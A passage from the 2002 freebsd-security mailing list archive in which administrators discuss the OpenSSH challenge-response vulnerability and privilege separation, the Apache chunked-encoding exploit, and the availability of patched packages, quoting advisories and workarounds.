1916 ?? S 8:57AM 0:00.16 sshd: excalibur@ttyp2 (sshd) excalibur@gawain:~> w 9:07AM up 5 days, 23:30, 3 users, load averages: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE WHAT excalibur p2 alb-66-66-232-51 8:57AM - w If that is all as it should be, then I don't see the relevance of those instructions, but thank you for providing the port. -=r=- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 6:58:27 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail7.svr.pol.co.uk (mail7.svr.pol.co.uk [195.92.193.21]) by hub.freebsd.org (Postfix) with ESMTP id 523ED37B401 for ; Wed, 26 Jun 2002 06:58:20 -0700 (PDT) Received: from [195.92.168.141] (helo=tmailb1.svr.pol.co.uk) by mail7.svr.pol.co.uk with esmtp (Exim 3.35 #1) id 17NDJL-0001sH-00 for security@freebsd.org; Wed, 26 Jun 2002 14:58:19 +0100 Received: from modem-2775.lion.dialup.pol.co.uk ([217.135.170.215] helo=chrome.intranet) by tmailb1.svr.pol.co.uk with smtp (Exim 3.35 #1) id 17NDJJ-0005Qh-00 for security@freebsd.org; Wed, 26 Jun 2002 14:58:18 +0100 Received: (qmail 8370 invoked by uid 500); 26 Jun 2002 14:06:45 -0000 From: steve-lists@reentrant.co.uk Date: Wed, 26 Jun 2002 15:06:45 +0100 To: "Philip J. Koenig" Cc: security@freebsd.org Subject: Re: Binary upgrade available Message-ID: <20020626150645.A8340@chrome.intranet> References: <20020626121130543.AAA754@empty1.ekahuna.com@pc02.ekahuna.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020626121130543.AAA754@empty1.ekahuna.com@pc02.ekahuna.com>; from pjklist@ekahuna.com on Wed, Jun 26, 2002 at 05:11:32AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org * Philip J. Koenig [06m26d02y 13:32]: > According to the steps outlined earlier to ascertain whether privsep > is working, in my case it seems not to be. (I am of the impression > that the path shown at the end should now show "/usr/empty"): > > > #lsof -p |grep rtd > sshd 109 root rtd VDIR 13,196608 1024 2 / This took me a while to figure out, but my understanding is this: The parent sshd process, still runs as root. During login (i.e. when there is a password prompt being displayed), sshd runs a less-privileged process, which is marked with [net] in the output of ps. This handles the connection process and, at least for my install of /usr/ports/security/openssh, runs as nobody in /usr/local/empty. For example: nobody 1068 6.1 3.7 3524 2092 ?? S 2:52PM 0:01.65 sshd: steve [net] (sshd) The output of lsof -p 1068 | grep rtd is then : sshd 1068 nobody rtd VDIR 116,131078 512 45177 /usr/local/empty which I think is what you were expecting before. After authentication, there are two process per session: a privileged process, marked with [priv] which is run as root; and another process which runs as the user which is logging in. The latter looks like "sshd: user@tty (sshd)". The above is just my understanding of it, but I hope that helps, Steve. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 7: 1:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from mile.nevermind.kiev.ua (office.netstyle.com.ua [213.186.199.26]) by hub.freebsd.org (Postfix) with ESMTP id 2F04A37B406 for ; Wed, 26 Jun 2002 07:01:06 -0700 (PDT) Received: from mile.nevermind.kiev.ua (never@localhost [127.0.0.1]) by mile.nevermind.kiev.ua (8.12.3/8.12.3) with ESMTP id g5QE0cqL079221; Wed, 26 Jun 2002 17:00:55 +0300 (EEST) (envelope-from never@mile.nevermind.kiev.ua) Received: (from never@localhost) by mile.nevermind.kiev.ua (8.12.3/8.12.3/Submit) id g5QE0UuO079219; Wed, 26 Jun 2002 17:00:30 +0300 (EEST) Date: Wed, 26 Jun 2002 17:00:29 +0300 From: Alexandr Kovalenko To: Marius Strom Cc: Mike Tancsa , freebsd-security@FreeBSD.ORG Subject: Re: Apache FreeBSD exploit released Message-ID: <20020626140029.GB61360@nevermind.kiev.ua> References: <20020622225822.GA65796@totem.fix.no> <20020622125713.547c2546.kzaraska@student.uci.agh.edu.pl> <3177.66.171.47.179.1024786088.squirrel@webmail.allneo.com> <20020622225822.GA65796@totem.fix.no> <5.1.0.14.0.20020623163303.071f8890@192.168.0.12> <20020623213601.GC3015@marius.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="WIyZ46R2i8wDzkSu" Content-Disposition: inline In-Reply-To: <20020623213601.GC3015@marius.org> User-Agent: Mutt/1.3.99i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --WIyZ46R2i8wDzkSu Content-Type: text/plain; charset=koi8-r Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Hello, Marius Strom! On Sun, Jun 23, 2002 at 04:36:01PM -0500, you wrote: > Snippet from my logs: >=20 > [Sat Jun 22 17:42:47 2002] [error] [client X.X.X.X] Transfer-Encoding: ch= unked - denied and logged Is it safe to deny this things? I mean, does anything real use this? >=20 > On Sun, 23 Jun 2002, Mike Tancsa wrote: > >=20 > > What does it looks like in the logs on a patched version of apache ? --=20 NEVE-RIPE Ukrainian FreeBSD User Group http://uafug.org.ua/ --WIyZ46R2i8wDzkSu Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9Gcj94jPu1egM76YRAjksAJ9OdNXWGBIyZP//6t6LNX5LBWcJlgCfdq6+ lhvJE5RoCzmz53mijlUED0Y= =LiAI -----END PGP SIGNATURE----- --WIyZ46R2i8wDzkSu-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 7:22: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.seattleFenix.net (sense-sea-MegaSub-1-501.oz.net [216.39.145.247]) by hub.freebsd.org (Postfix) with ESMTP id 9511337B425 for ; Wed, 26 Jun 2002 07:21:35 -0700 (PDT) Received: (from roo@localhost) by mail.seattleFenix.net (8.11.6/8.11.6) id g5QENQ507588 for freebsd-security@FreeBSD.ORG; Wed, 26 Jun 2002 07:23:26 -0700 (PDT) (envelope-from roo) Date: Wed, 26 Jun 2002 07:23:26 -0700 From: Benjamin Krueger To: freebsd-security@FreeBSD.ORG Subject: Much ado about nothing. Message-ID: <20020626072326.A4270@mail.seattleFenix.net> References: <20020625024401.GB43738@madman.nectar.cc> <200206250248.g5P2mJLJ031907@cvs.openbsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200206250248.g5P2mJLJ031907@cvs.openbsd.org>; from deraadt@cvs.openbsd.org on Mon, Jun 24, 2002 at 08:48:19PM -0600 X-PGP-Key: http://www.macguire.net/benjamin/public_key.asc Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20584 Regards, -- Benjamin Krueger "Life is far too important a thing ever to talk seriously about." - Oscar Wilde (1854 - 1900) ---------------------------------------------------------------- Send mail w/ subject 'send public key' or query for (0x251A4B18) Fingerprint = A642 F299 C1C1 C828 F186 A851 CFF0 7711 251A 4B18 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 7:37:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from obsidian.sentex.ca (obsidian.sentex.ca [64.7.128.101]) by hub.freebsd.org (Postfix) with ESMTP id 4AB7A37B406 for ; Wed, 26 Jun 2002 07:37:16 -0700 (PDT) Received: from simian.sentex.net (pyroxene.sentex.ca [199.212.134.18]) by obsidian.sentex.ca (8.12.4/8.12.4) with ESMTP id g5QEbExd004188 for ; Wed, 26 Jun 2002 10:37:14 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Wed, 26 Jun 2002 10:40:05 -0400 To: freebsd-security@FreeBSD.ORG From: Mike Tancsa Subject: OpenSSH Advisory (was Re: Much ado about nothing.) In-Reply-To: <20020626072326.A4270@mail.seattleFenix.net> References: <200206250248.g5P2mJLJ031907@cvs.openbsd.org> <20020625024401.GB43738@madman.nectar.cc> <200206250248.g5P2mJLJ031907@cvs.openbsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (obsidian/20020220) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Can someone confirm for me that the quote, ---------- Impact: OpenBSD, FreeBSD-Current, and other OpenSSH implementations may be vulnerable to a remote, superuser compromise. Affected Versions: OpenBSD 3.0 OpenBSD 3.1 FreeBSD-Current OpenSSH 3.0-3.2.3 ------------end quote------------- would imply that the version 2.9 in STABLE is not vulnerable ? At 07:23 AM 26/06/2002 -0700, Benjamin Krueger wrote: >http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20584 > >Regards, > >-- >Benjamin Krueger > >"Life is far too important a thing ever to talk seriously about." >- Oscar Wilde (1854 - 1900) >---------------------------------------------------------------- >Send mail w/ subject 'send public key' or query for (0x251A4B18) >Fingerprint = A642 F299 C1C1 C828 F186 A851 CFF0 7711 251A 4B18 > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 7:54:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id 21AF037B435 for ; Wed, 26 Jun 2002 07:52:38 -0700 (PDT) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id AAA26617; Thu, 27 Jun 2002 00:52:33 +1000 (EST) From: Darren Reed Message-Id: <200206261452.AAA26617@caligula.anu.edu.au> Subject: Re: OpenSSH Advisory (was Re: Much ado about nothing.) To: mike@sentex.net (Mike Tancsa) Date: Thu, 27 Jun 2002 00:52:33 +1000 (Australia/ACT) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> from "Mike Tancsa" at Jun 26, 2002 10:40:05 AM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org From the OpenSSH 3.4 announcement: Changes since OpenSSH 3.3: ============================ Security Changes: ================= All versions of OpenSSH's sshd between 2.9.9 and 3.3 contain an input validation error that can result in an integer overflow and privilege escalation. OpenSSH 3.4 fixes this bug. In addition, OpenSSH 3.4 adds many checks to detect invalid input and mitigate resource exhaustion attacks. OpenSSH 3.2 and later prevent privilege escalation if UsePrivilegeSeparation is enabled in sshd_config. OpenSSH 3.3 enables UsePrivilegeSeparation by default. In some mail from Mike Tancsa, sie said: > > > Can someone confirm for me that the quote, > > ---------- > Impact: > > OpenBSD, FreeBSD-Current, and other OpenSSH implementations may be > vulnerable to a remote, superuser compromise. > > Affected Versions: > > OpenBSD 3.0 > OpenBSD 3.1 > FreeBSD-Current > OpenSSH 3.0-3.2.3 > > ------------end quote------------- > > would imply that the version 2.9 in STABLE is not vulnerable ? > > > > At 07:23 AM 26/06/2002 -0700, Benjamin Krueger wrote: > > >http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20584 > > > >Regards, > > > >-- > >Benjamin Krueger > > > >"Life is far too important a thing ever to talk seriously about." > >- Oscar Wilde (1854 - 1900) > >---------------------------------------------------------------- > >Send mail w/ subject 'send public key' or query for (0x251A4B18) > >Fingerprint = A642 F299 C1C1 C828 F186 A851 CFF0 7711 251A 4B18 > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 7:58:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 2CA8337B6C5 for ; Wed, 26 Jun 2002 07:54:55 -0700 (PDT) Received: from fledge.watson.org (fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.12.3/8.12.3) with SMTP id g5QEsqw6091762; Wed, 26 Jun 2002 10:54:52 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Wed, 26 Jun 2002 10:54:51 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Benjamin Krueger Cc: freebsd-security@FreeBSD.ORG Subject: Re: Much ado about nothing. In-Reply-To: <20020626072326.A4270@mail.seattleFenix.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Yeah, I believe the version of OpenSSH shipped in -STABLE and past releases is not vulnerable, but we'll need to sit down and check carefully. People running -CURRENT (what few there are) should slide their trees forward, however. Robert N M Watson FreeBSD Core Team, TrustedBSD Projects robert@fledge.watson.org Network Associates Laboratories On Wed, 26 Jun 2002, Benjamin Krueger wrote: > > http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20584 > > Regards, > > -- > Benjamin Krueger > > "Life is far too important a thing ever to talk seriously about." > - Oscar Wilde (1854 - 1900) > ---------------------------------------------------------------- > Send mail w/ subject 'send public key' or query for (0x251A4B18) > Fingerprint = A642 F299 C1C1 C828 F186 A851 CFF0 7711 251A 4B18 > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 8: 2:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id C52B937B6D2 for ; Wed, 26 Jun 2002 07:55:04 -0700 (PDT) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.11.4/8.11.3) with ESMTP id g5QEsrH74142; Wed, 26 Jun 2002 10:54:53 -0400 (EDT) Date: Wed, 26 Jun 2002 10:54:53 -0400 (EDT) From: Ralph Huntington To: Benjamin Krueger Cc: Subject: Re: Much ado about nothing. In-Reply-To: <20020626072326.A4270@mail.seattleFenix.net> Message-ID: <20020626105132.E41820-100000@mohegan.mohawk.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org From: http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20584 ===================================================================== Administrators can remove this vulnerability [in shhd] by disabling the Challenge-Response authentication parameter within the OpenSSH daemon configuration file. To disable this parameter, locate the corresponding line [in the sshd config file] and change it to the line below [or add the line presumably]: ChallengeResponseAuthentication no This workaround will permanently remove the vulnerability. ===================================================================== Hoping someone can/will confirm the above... -=r=- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 8: 4:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from gwdu60.gwdg.de (gwdu60.gwdg.de [134.76.98.60]) by hub.freebsd.org (Postfix) with ESMTP id B996737B6F9 for ; Wed, 26 Jun 2002 07:55:43 -0700 (PDT) Received: from localhost (kheuer@localhost) by gwdu60.gwdg.de (8.11.6/8.11.6) with ESMTP id g5QEtg136684 for ; Wed, 26 Jun 2002 16:55:42 +0200 (CEST) (envelope-from kheuer@gwdg.de) X-Authentication-Warning: gwdu60.gwdg.de: kheuer owned process doing -bs Date: Wed, 26 Jun 2002 16:55:42 +0200 (CEST) From: Konrad Heuer To: freebsd-security@freebsd.org Subject: bsd libc dns resolving code vulnerable? Message-ID: <20020626165034.Q35146-100000@gwdu60.gwdg.de> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Does already someone know about: http://www.pine.nl/advisories/pine-cert-20020601.txt Any comments? Thanks K. Heuer (kheuer@gwdg.de) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 8: 5:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from out008.verizon.net (out008pub.verizon.net [206.46.170.108]) by hub.freebsd.org (Postfix) with ESMTP id 786B337B7E7 for ; Wed, 26 Jun 2002 07:59:30 -0700 (PDT) Received: from DOH ([141.150.130.160]) by out008.verizon.net (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with ESMTP id <20020626145929.CEBE4125.out008.verizon.net@DOH> for ; Wed, 26 Jun 2002 09:59:29 -0500 From: "Albert Martinez" To: Subject: RE: Viruses attaahce to emails in this mailing list Date: Wed, 26 Jun 2002 11:00:42 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <20020626125754.GD70856@isnic.is> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hmm, interesting, virus delivery via attachments on a security list. What reason is there for this list to allow attachments? Why wouldn't somebody protect themselves from these virii? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 8: 7:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id ED24C37B8BA for ; Wed, 26 Jun 2002 08:01:30 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 7FF652F; Wed, 26 Jun 2002 10:01:30 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5QF1UsE065693; Wed, 26 Jun 2002 10:01:30 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5QF1UDk065692; Wed, 26 Jun 2002 10:01:30 -0500 (CDT) Date: Wed, 26 Jun 2002 10:01:30 -0500 From: "Jacques A. Vidrine" To: Mike Tancsa Cc: freebsd-security@FreeBSD.ORG Subject: Re: OpenSSH Advisory (was Re: Much ado about nothing.) Message-ID: <20020626150129.GE65626@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Mike Tancsa , freebsd-security@FreeBSD.ORG References: <200206250248.g5P2mJLJ031907@cvs.openbsd.org> <20020625024401.GB43738@madman.nectar.cc> <200206250248.g5P2mJLJ031907@cvs.openbsd.org> <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 26, 2002 at 10:40:05AM -0400, Mike Tancsa wrote: > > Can someone confirm for me that the quote, [snip] > would imply that the version 2.9 in STABLE is not vulnerable ? That does appear to be the case. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 8:11:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from obsidian.sentex.ca (obsidian.sentex.ca [64.7.128.101]) by hub.freebsd.org (Postfix) with ESMTP id D681737BA80 for ; Wed, 26 Jun 2002 08:07:58 -0700 (PDT) Received: from simian.sentex.net (pyroxene.sentex.ca [199.212.134.18]) by obsidian.sentex.ca (8.12.4/8.12.4) with ESMTP id g5QF7rxd006553; Wed, 26 Jun 2002 11:07:53 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20020626110043.0522ded8@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Wed, 26 Jun 2002 11:10:44 -0400 To: Darren Reed From: Mike Tancsa Subject: Re: OpenSSH Advisory (was Re: Much ado about nothing.) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <200206261452.AAA26617@caligula.anu.edu.au> References: <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (obsidian/20020220) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 12:52 AM 27/06/2002 +1000, Darren Reed wrote: > >From the OpenSSH 3.4 announcement: > >Changes since OpenSSH 3.3: >============================ > >Security Changes: >================= > > All versions of OpenSSH's sshd between 2.9.9 and 3.3 > contain an input validation error that can result in OK, but 2.9.9... is that really the same as FreeBSD's SSH-1.99-OpenSSH_2.9 FreeBSD localisations 20020307 Also, the ISS advisory states "Administrators can remove this vulnerability by disabling the Challenge-Response authentication parameter within the OpenSSH daemon configuration file. This filename and path is typically: /etc/ssh/sshd_config. To disable this parameter, locate the corresponding line and change it to the line below: ChallengeResponseAuthentication no " This would imply there is a work around, but the talk before hand ----quote from Message-Id: <200206242327.g5ONRBLI012690@cvs.openbsd.org>--- Bullshit. You have been told to move up to privsep so that you are immunized by the time the bug is released. If you fail to immunize your users, then the best you can do is tell them to disable OpenSSH until 3.4 is out early next week with the bugfix in it. Of course, then the bug will be public. ----end-quote--- ---Mike >In some mail from Mike Tancsa, sie said: > > > > > > Can someone confirm for me that the quote, > > > > ---------- > > Impact: > > > > OpenBSD, FreeBSD-Current, and other OpenSSH implementations may be > > vulnerable to a remote, superuser compromise. > > > > Affected Versions: > > > > OpenBSD 3.0 > > OpenBSD 3.1 > > FreeBSD-Current > > OpenSSH 3.0-3.2.3 > > > > ------------end quote------------- > > > > would imply that the version 2.9 in STABLE is not vulnerable ? > > > > > > > > At 07:23 AM 26/06/2002 -0700, Benjamin Krueger wrote: > > > > >http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20584 > > > > > >Regards, > > > > > >-- > > >Benjamin Krueger > > > > > >"Life is far too important a thing ever to talk seriously about." > > >- Oscar Wilde (1854 - 1900) > > >---------------------------------------------------------------- > > >Send mail w/ subject 'send public key' or query for (0x251A4B18) > > >Fingerprint = A642 F299 C1C1 C828 F186 A851 CFF0 7711 251A 4B18 > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > > >with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 8:17:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from d188h80.mcb.uconn.edu (d188h80.mcb.uconn.edu [137.99.188.80]) by hub.freebsd.org (Postfix) with SMTP id 74F2C37BCE3 for ; Wed, 26 Jun 2002 08:16:46 -0700 (PDT) Received: (qmail 96946 invoked by uid 1001); 26 Jun 2002 15:16:40 -0000 Date: Wed, 26 Jun 2002 11:16:40 -0400 From: "Peter C. Lai" To: George Giles Cc: freebsd-security@freebsd.org Subject: Re: Apache 1.3.26 package availability Message-ID: <20020626111640.A96913@cowbert.2y.net> Reply-To: peter.lai@uconn.edu References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from george.giles@vanderbilt.edu on Wed, Jun 26, 2002 at 08:07:18AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 26, 2002 at 08:07:18AM -0500, George Giles wrote: > > HAs an apache 1.3.26 and mod_ssl package been produced that ameliorates this > exploit ? > cvsup to the latest ports. I don't know how to build a binary package from ports or else i would help you. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Peter C. Lai University of Connecticut Dept. of Molecular and Cell Biology | Undergraduate Research Assistant http://cowbert.2y.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 8:20:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from hex.databits.net (hex.csh.rit.edu [129.21.60.134]) by hub.freebsd.org (Postfix) with ESMTP id D694B37B4AA for ; Wed, 26 Jun 2002 08:20:18 -0700 (PDT) Received: by hex.databits.net (Postfix, from userid 1001) id 63E792111F; Wed, 26 Jun 2002 11:20:18 -0400 (EDT) Date: Wed, 26 Jun 2002 11:20:18 -0400 From: Pete Fritchman To: peter.lai@uconn.edu Cc: freebsd-security@freebsd.org Subject: Re Apache 1.3.26 package availability Message-ID: <20020626112018.B76010@absolutbsd.org> References: <20020626111640.A96913@cowbert.2y.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020626111640.A96913@cowbert.2y.net>; from sirmoo@cowbert.2y.net on Wed, Jun 26, 2002 at 11:16:40AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ++ 26/06/02 11:16 -0400 - Peter C. Lai: | On Wed, Jun 26, 2002 at 08:07:18AM -0500, George Giles wrote: | > | > HAs an apache 1.3.26 and mod_ssl package been produced that ameliorates this | > exploit ? | > | | cvsup to the latest ports. I don't know how to build a binary package from | ports or else i would help you. ``make package''. This also begs the question: when is a new package going to make it to the FTP mirrors? It would be nice if there was a way for security-officer@ to manually push newly updated packages fixing security problems to the ftp servers so we don't lag behind... --pete -- Pete Fritchman [petef@(databits.net|freebsd.org|wyom.net)] finger petef@databits.net for PGP key To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 8:24:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 62D1037B6A9 for ; Wed, 26 Jun 2002 08:22:28 -0700 (PDT) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.11.6/8.11.6) id g5QFMLC55119 for freebsd-security@freebsd.org; Wed, 26 Jun 2002 12:22:21 -0300 (ART) (envelope-from fschapachnik@vianetworks.com.ar) X-Authentication-Warning: ns1.via-net-works.net.ar: fpscha set sender to fschapachnik@vianetworks.com.ar using -f Date: Wed, 26 Jun 2002 12:22:21 -0300 From: Fernando Schapachnik To: freebsd-security@freebsd.org Subject: [openssh-unix-announce] OpenSSH Security Advisory (adv.iss) (fwd) Message-ID: <20020626122221.A52287@ns1.via-net-works.net.ar> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This explains the problem pretty well. ----- Forwarded message from Markus Friedl ----- From: Markus Friedl To: openssh-unix-announce@mindrot.org User-Agent: Mutt/1.3.28i Subject: [openssh-unix-announce] OpenSSH Security Advisory (adv.iss) Errors-To: 